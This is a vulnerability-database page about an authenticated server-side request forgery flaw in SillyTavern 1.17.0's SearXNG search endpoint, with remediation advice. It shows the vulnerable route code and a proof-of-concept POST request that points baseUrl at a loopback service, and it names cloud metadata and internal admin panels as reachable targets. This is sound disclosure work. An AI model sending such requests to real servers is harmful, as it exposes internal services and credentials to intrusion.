Skip to main content

SillyTavern CVE-2026-46372

| EUVDEUVD-2026-33397 HIGH
Server-Side Request Forgery (SSRF) (CWE-918)
2026-05-19 https://github.com/SillyTavern/SillyTavern GHSA-qg89-qwwh-5f3j
8.5
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
8.5 HIGH
AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Confidentiality
High
Integrity
Low
Availability
None

Lifecycle Timeline

2
Source Code Evidence Fetched
May 19, 2026 - 20:31 vuln.today
Analysis Generated
May 19, 2026 - 20:31 vuln.today

DescriptionGitHub Advisory

Resolution

SillyTavern 1.18.0 added a generic server-side request filter (Private Request Whitelisting). Since we expect users to use the application in a trusted environment, the filter is disabled by default, however it is strongly advised to be enabled and properly configured when an instance is being hosted over a network, as suggested by a console warning message and an officially published security checklist for administrators.

Documentation:

  • https://docs.sillytavern.app/administration/config-yaml/#private-address-whitelisting
  • https://docs.sillytavern.app/administration/#security-checklist

Note on future SSRF findings

Since the request filter applies to the entire application, no SSRF vulnerabilities against individual endpoints will be accepted, unless it has been proven that a properly configured and enabled filter can be bypassed in an undocumented way. Only advisories disclosed before the 1.18.0 release will be posted if their concern is SSRF.

Summary

SillyTavern 1.17.0 exposes /api/search/searxng, which accepts attacker-controlled baseUrl and uses it directly to build outbound server-side fetches. An authenticated low-privilege user can point baseUrl at an internal or loopback HTTP service and receive the /search response body.

Confirmed version: SillyTavern 1.17.0 from the audited source tree. Broader affected versions and patched versions should be confirmed by the maintainer.

Details

The /api/search/searxng route in src/endpoints/search.js reads baseUrl from request.body and performs no allowlist, IP range, DNS, or scheme validation before making outbound requests.

Core vulnerable path:

js
router.post('/searxng', async (request, response) => {
    const { baseUrl, query, preferences, categories } = request.body;
    if (!baseUrl || !query) {
        return response.status(400).send('Missing required parameters');
    }

    const mainPageUrl = new URL(baseUrl);
    const mainPageRequest = await fetch(mainPageUrl, { headers: visitHeaders });
    ...
    const searchUrl = new URL('/search', baseUrl);
    const searchParams = new URLSearchParams();
    searchParams.append('q', query);
    ...
    const searchResult = await fetch(searchUrl, { headers: visitHeaders });
    ...
    const data = await searchResult.text();
    return response.send(data);
});

src/server-startup.js mounts this router at /api/search, and src/server-main.js applies login middleware before the API routes. This means the source is a remote authenticated POST request and the sink is server-side fetch() to attacker-selected hosts.

PoC

Attacker prerequisites: a valid SillyTavern web session, or access to a deployment where user accounts are disabled.

Start an internal mock service on the target host:

js
import http from 'node:http';

http.createServer((req, res) => {
  if (req.url === '/') {
    res.writeHead(200, { 'Content-Type': 'text/html' });
    return res.end('<html><head><link href="/client.css" rel="stylesheet"></head></html>');
  }
  if (req.url === '/client.css') {
    res.writeHead(200, { 'Content-Type': 'text/css' });
    return res.end('body{}');
  }
  if (req.url.startsWith('/search?q=')) {
    res.writeHead(200, { 'Content-Type': 'text/plain' });
    return res.end('INTERNAL-SEARCH-RESULT');
  }
  res.writeHead(404);
  res.end('not found');
}).listen(9091, '127.0.0.1');

Then send:

http
POST /api/search/searxng HTTP/1.1
Host: TARGET:8000
Cookie: session-...=...
X-CSRF-Token: <token from /csrf-token>
Content-Type: application/json

{"baseUrl":"http://127.0.0.1:9091/","query":"x"}

Result based on the route logic: SillyTavern first fetches http://127.0.0.1:9091/, then fetches http://127.0.0.1:9091/search?q=x, and returns INTERNAL-SEARCH-RESULT to the attacker.

Impact

This is an authenticated SSRF primitive with arbitrary host and port selection. It can disclose responses from loopback or internal HTTP services reachable from the SillyTavern host and may enable interaction with internal admin panels, development services, cloud metadata endpoints in applicable deployments, or service discovery across private networks.

AnalysisAI

Server-side request forgery in SillyTavern 1.17.0 allows authenticated low-privilege users to coerce the server into making arbitrary HTTP requests against internal or loopback addresses via the /api/search/searxng endpoint's unvalidated baseUrl parameter, returning response bodies to the attacker. The flaw was addressed in 1.18.0, which introduced an opt-in Private Request Whitelisting filter (disabled by default). Publicly available exploit code exists in the GitHub Security Advisory GHSA-qg89-qwwh-5f3j, but no public exploit identified at time of analysis as actively exploited.

Technical ContextAI

SillyTavern is a Node.js/Express-based front-end for large language model interactions, distributed via npm as the 'sillytavern' package. The vulnerability is a classic CWE-918 (Server-Side Request Forgery) in src/endpoints/search.js: the POST /api/search/searxng handler reads a user-supplied baseUrl from the JSON body and passes it directly into new URL() and node-fetch without any allowlist, IP-range check, DNS resolution check, or scheme restriction. Because src/server-main.js applies login middleware before mounting the /api/search router from src/server-startup.js, the sink is reachable by any logged-in account, regardless of privilege. The fetch call uses default behavior, which honors HTTP, HTTPS, and follows redirects, expanding the reachable surface to loopback, RFC1918, link-local (including cloud metadata 169.254.169.254), and any host the SillyTavern process can route to.

RemediationAI

Vendor-released patch: upgrade to SillyTavern 1.18.0 or later, then explicitly enable and configure the new Private Request Whitelisting feature, which is shipped disabled by default - see https://docs.sillytavern.app/administration/config-yaml/#private-address-whitelisting and the administrator security checklist at https://docs.sillytavern.app/administration/#security-checklist. Upgrading without enabling the whitelist does not mitigate the issue. For deployments that cannot upgrade immediately, restrict network egress from the SillyTavern host via host-level firewall rules to block outbound connections to RFC1918 ranges, 127.0.0.0/8, and 169.254.169.254/32 (trade-off: breaks any legitimate self-hosted SearXNG instance), disable user self-registration and rotate credentials to limit who can reach the authenticated endpoint, and place the application behind a reverse proxy that strips or blocks POSTs to /api/search/searxng (trade-off: breaks the SearXNG search feature entirely). Refer to GHSA-qg89-qwwh-5f3j for the canonical advisory.

Share

CVE-2026-46372 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy